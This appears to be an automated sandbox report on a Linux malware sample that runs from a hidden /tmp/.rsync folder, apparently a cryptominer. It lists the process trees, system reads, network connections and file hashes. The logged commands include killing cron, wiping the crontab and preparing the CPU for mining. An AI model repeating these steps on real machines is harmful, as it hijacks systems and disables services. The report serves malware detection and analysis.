| File opened for reading | /proc/602/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/9/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/277/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/596/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/17/status | /bin/ps | N/A |
| File opened for reading | /proc/324/status | /bin/ps | N/A |
| File opened for reading | /proc/640/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/15/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/4/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/281/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/104/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/320/status | /bin/ps | N/A |
| File opened for reading | /proc/147/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/15/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/4/stat | /bin/ps | N/A |
| File opened for reading | /proc/22/status | /bin/ps | N/A |
| File opened for reading | /proc/140/status | /bin/ps | N/A |
| File opened for reading | /proc/29/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/279/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/9/stat | /bin/ps | N/A |
| File opened for reading | /proc/29/stat | /bin/ps | N/A |
| File opened for reading | /proc/21/cmdline | /bin/ps | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/.proc | /tmp/.rsync/a/stop | N/A |
Processes
/tmp/.rsync/a/stop
[/tmp/.rsync/a/stop]
/usr/bin/pkill
[pkill -9 cron]
/usr/bin/killall
[killall -9 cron]
/bin/ps
[ps x]
/bin/grep
[grep cron]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/rm
[rm -rf .proc]
Network
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-mipsel-20240418-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/.rsync/c/golan
[/tmp/.rsync/c/golan]
Network
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
0s
Max time network
132s
Command Line
Signatures
Processes
/tmp/.rsync/c/lib/32/libnss_files.so.2
[/tmp/.rsync/c/lib/32/libnss_files.so.2]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Processes
/tmp/.rsync/c/lib/32/libresolv-2.23.so
[/tmp/.rsync/c/lib/32/libresolv-2.23.so]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
10s
Max time network
132s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/run | N/A |
| File opened for modification | /tmp/.rsync/a/bash.pid | /tmp/.rsync/a/run | N/A |
Processes
/tmp/.rsync/a/run
[/tmp/.rsync/a/run]
/tmp/.rsync/a/stop
[./stop]
/bin/sleep
[sleep 10]
/bin/cat
[cat dir.dir]
/bin/uname
[uname -m]
/tmp/.rsync/a/cron
[./cron]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| GB | 195.181.164.15:443 | tcp |
Files
/tmp/.rsync/a/dir.dir
| MD5 | b3d878adcf4672bbd1f31cffac10c769 |
| SHA1 | ce5798837933ece35a7e26a0a3dc06cab19c6275 |
| SHA256 | ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7 |
| SHA512 | 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c |
/tmp/.rsync/a/bash.pid
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral29
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:58
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Processes
/tmp/.rsync/c/lib/32/libresolv.so.2
[/tmp/.rsync/c/lib/32/libresolv.so.2]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp |
Files
Analysis: behavioral30
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Processes
/tmp/.rsync/c/lib/32/tsm
[/tmp/.rsync/c/lib/32/tsm]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-mipsbe-20240611-en
Max time kernel
14s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/.rsync/a/upd | /tmp/.rsync/a/upd | N/A |
Enumerates running processes
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /sbin/sysctl | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/node | /tmp/.rsync/a/a | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/76/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/120/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/384/stat | /bin/ps | N/A |
| File opened for reading | /proc/12/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/76/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/2/status | /bin/ps | N/A |
| File opened for reading | /proc/3/status | /bin/ps | N/A |
| File opened for reading | /proc/23/status | /bin/ps | N/A |
| File opened for reading | /proc/10/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/725/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/71/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/74/status | /bin/ps | N/A |
| File opened for reading | /proc/748/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/755/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/37/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/677/status | /bin/ps | N/A |
| File opened for reading | /proc/728/stat | /bin/ps | N/A |
| File opened for reading | /proc/387/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/748/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/7/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/687/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1/stat | /bin/ps | N/A |
| File opened for reading | /proc/700/stat | /bin/ps | N/A |
| File opened for reading | /proc/78/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/8/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/386/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/756/status | /bin/ps | N/A |
| File opened for reading | /proc/387/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/13/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/170/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/723/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/24/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/72/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/14/stat | /bin/ps | N/A |
| File opened for reading | /proc/15/stat | /bin/ps | N/A |
| File opened for reading | /proc/170/stat | /bin/ps | N/A |
| File opened for reading | /proc/384/status | /bin/ps | N/A |
| File opened for reading | /proc/81/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/269/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/676/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/78/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/73/status | /bin/ps | N/A |
| File opened for reading | /proc/667/status | /bin/ps | N/A |
| File opened for reading | /proc/725/stat | /bin/ps | N/A |
| File opened for reading | /proc/19/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/17/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/4/stat | /bin/ps | N/A |
| File opened for reading | /proc/16/status | /bin/ps | N/A |
| File opened for reading | /proc/727/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/16/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/6/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/3/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/18/stat | /bin/ps | N/A |
| File opened for reading | /proc/22/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/731/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/12/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/727/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/705/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/23/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/387/stat | /bin/ps | N/A |
| File opened for reading | /proc/151/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/363/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/3/cmdline | /usr/bin/pkill | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/a | N/A |
| File opened for modification | /tmp/.rsync/a/upd | /tmp/.rsync/a/a | N/A |
| File opened for modification | /tmp/.rsync/a/.proc | /tmp/.rsync/a/stop | N/A |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/run | N/A |
| File opened for modification | /tmp/.rsync/a/bash.pid | /tmp/.rsync/a/run | N/A |
Processes
/tmp/.rsync/a/a
[/tmp/.rsync/a/a]
/usr/bin/crontab
[crontab -r]
/bin/cat
[cat dir.dir]
/usr/bin/nproc
[nproc]
/sbin/sysctl
[sysctl -w vm.nr_hugepages=1]
/usr/bin/find
[find /sys/devices/system/node/node* -maxdepth 0 -type d]
/sbin/modprobe
[modprobe msr]
/bin/grep
[grep AMD Ryzen]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep Intel]
/bin/cat
[cat /proc/cpuinfo]
/bin/chmod
[chmod u+x upd]
/bin/chmod
[chmod 777 a anacron cron dir.dir run stop upd]
/tmp/.rsync/a/upd
[./upd]
/tmp/.rsync/a/run
[./run]
/tmp/.rsync/a/stop
[./stop]
/usr/bin/pkill
[pkill -9 cron]
/usr/bin/killall
[killall -9 cron]
/bin/grep
[grep cron]
/bin/grep
[grep -v grep]
/bin/ps
[ps x]
/usr/bin/awk
[awk {print $1}]
/bin/rm
[rm -rf .proc]
/bin/sleep
[sleep 10]
/bin/cat
[cat dir.dir]
/bin/uname
[uname -m]
Network
Files
/tmp/.rsync/a/dir.dir
| MD5 | b3d878adcf4672bbd1f31cffac10c769 |
| SHA1 | ce5798837933ece35a7e26a0a3dc06cab19c6275 |
| SHA256 | ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7 |
| SHA512 | 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c |
/tmp/.rsync/a/upd
| MD5 | a136fbe534c2487d3c89bd6a26847bd0 |
| SHA1 | 11b9362ba79b67dd5d5baf7cf11e0003f049d6e0 |
| SHA256 | 419a443ff93475ef3abb6e71e5a94e56aea8b7c1f1c4402b3662425815432d46 |
| SHA512 | 85047cf9d22037d2581ae41275107b243c0bb3259b57fe46bd3fd04a1abe75a7fdeace8a9eae1fae31349a00183206b40259ab3957db8f4f16a79e67133485e9 |
/tmp/.rsync/a/bash.pid
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
0s
Max time network
131s
Command Line
Signatures
Enumerates running processes
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/1126/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1130/status | /bin/ps | N/A |
| File opened for reading | /proc/89/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/202/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1193/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/170/stat | /bin/ps | N/A |
| File opened for reading | /proc/445/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/137/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1352/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1262/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1044/status | /bin/ps | N/A |
| File opened for reading | /proc/1372/stat | /bin/ps | N/A |
| File opened for reading | /proc/30/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1114/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1167/status | /bin/ps | N/A |
| File opened for reading | /proc/1223/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/203/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1294/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1496/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/317/stat | /bin/ps | N/A |
| File opened for reading | /proc/953/status | /bin/ps | N/A |
| File opened for reading | /proc/26/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1130/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1262/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1122/status | /bin/ps | N/A |
| File opened for reading | /proc/1186/stat | /bin/ps | N/A |
| File opened for reading | /proc/1494/stat | /bin/ps | N/A |
| File opened for reading | /proc/684/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/914/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1038/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1085/status | /bin/ps | N/A |
| File opened for reading | /proc/1247/stat | /bin/ps | N/A |
| File opened for reading | /proc/914/status | /bin/ps | N/A |
| File opened for reading | /proc/1147/status | /bin/ps | N/A |
| File opened for reading | /proc/30/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/312/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/13/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/655/status | /bin/ps | N/A |
| File opened for reading | /proc/914/stat | /bin/ps | N/A |
| File opened for reading | /proc/1182/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/9/status | /bin/ps | N/A |
| File opened for reading | /proc/18/stat | /bin/ps | N/A |
| File opened for reading | /proc/1183/stat | /bin/ps | N/A |
| File opened for reading | /proc/7/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/16/stat | /bin/ps | N/A |
| File opened for reading | /proc/1044/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1061/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1143/status | /bin/ps | N/A |
| File opened for reading | /proc/1072/stat | /bin/ps | N/A |
| File opened for reading | /proc/1126/stat | /bin/ps | N/A |
| File opened for reading | /proc/471/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/28/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/26/status | /bin/ps | N/A |
| File opened for reading | /proc/171/stat | /bin/ps | N/A |
| File opened for reading | /proc/78/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/245/stat | /bin/ps | N/A |
| File opened for reading | /proc/708/status | /bin/ps | N/A |
| File opened for reading | /proc/13/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/158/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/31/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/202/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1505/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/19/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/413/stat | /usr/bin/killall | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/.proc | /tmp/.rsync/a/stop | N/A |
Processes
/tmp/.rsync/a/stop
[/tmp/.rsync/a/stop]
/usr/bin/pkill
[pkill -9 cron]
/usr/bin/killall
[killall -9 cron]
/usr/bin/awk
[awk {print $1}]
/bin/grep
[grep -v grep]
/bin/grep
[grep cron]
/bin/ps
[ps x]
/bin/rm
[rm -rf .proc]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 195.181.164.20:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 195.181.164.16:443 | 1527653184.rsc.cdn77.org | tcp |
Files
Analysis: behavioral23
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:54
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/.rsync/c/lib/32/libc.so.6
[/tmp/.rsync/c/lib/32/libc.so.6]